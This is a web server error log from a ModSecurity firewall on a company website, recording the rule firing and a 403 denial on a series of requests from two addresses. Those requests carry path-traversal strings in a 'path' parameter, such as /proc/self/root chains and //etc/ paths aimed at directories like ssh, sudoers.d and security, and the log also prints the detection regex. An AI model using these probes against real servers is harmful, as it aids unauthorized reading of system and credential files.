[Wed Mar 18 04:05:34.432317 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:56232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOvQkwaGbbGflqUZDT1QAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:35.879816 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:41878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOv9a6ubjKNq_cu4ZXjAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:37.233525 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:41894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOwda6ubjKNq_cu4ZXlAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:38.619046 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:41908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOwuyqAr6etmhZHNp6ZAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:39.927795 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:46358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOwwkwaGbbGflqUZDT1gAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:42.284022 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:46374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOxtY0UrI5A3LftIxT2gAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:44.659079 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:46380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOyCmAPhZkrhU8w4kvIwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:45.957179 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:46394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOyeyqAr6etmhZHNp6ZgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:49.515022 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:46410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzeyqAr6etmhZHNp6agAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:50.177900 2026] [:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:49950] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzsdf6f5d65gmYZSR5QAAAsE"]
[Wed Mar 18 04:05:50.405586 2026] [:error] [pid 31803:tid 140411683178240] [client 216.73.216.191:49960] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzuyqAr6etmhZHNp6awAAAEc"]
[Wed Mar 18 04:05:50.558094 2026] [:error] [pid 17653:tid 140411691570944] [client 216.73.216.191:49968] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzsdf6f5d65gmYZSR6AAAAsY"]
[Wed Mar 18 04:05:50.750046 2026] [:error] [pid 17653:tid 140411725141760] [client 216.73.216.191:49982] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzsdf6f5d65gmYZSR6gAAAsI"]
[Wed Mar 18 04:05:50.843217 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:39190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzsdf6f5d65gmYZSR6wAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:51.576535 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:50024] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOz-oXxyEfFpUF8f8unwAAAVc"]
[Wed Mar 18 04:05:51.880006 2026] [:error] [pid 15051:tid 140411574073088] [client 216.73.216.191:50038] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOzymAPhZkrhU8w4kvNgAAAJQ"]
[Wed Mar 18 04:05:52.247637 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:39204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO0AkwaGbbGflqUZDT2QAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:53.610962 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:39220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO0fu8EFLIOrSqIpvHrwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:54.910302 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:39224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO0kzinOy1jxa1j4fT1AAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:56.237802 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:39236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO1NY0UrI5A3LftIxT7wAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:57.515172 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:39238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO1eoXxyEfFpUF8f8uoQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:58.848545 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:39252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO1vu8EFLIOrSqIpvHsgAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:00.172251 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:46442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO2Ow_le52K8_3pV2hNgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:04.759320 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:46448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO3OyqAr6etmhZHNp6dAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:06.046152 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:46460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO3uoXxyEfFpUF8f8uowAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
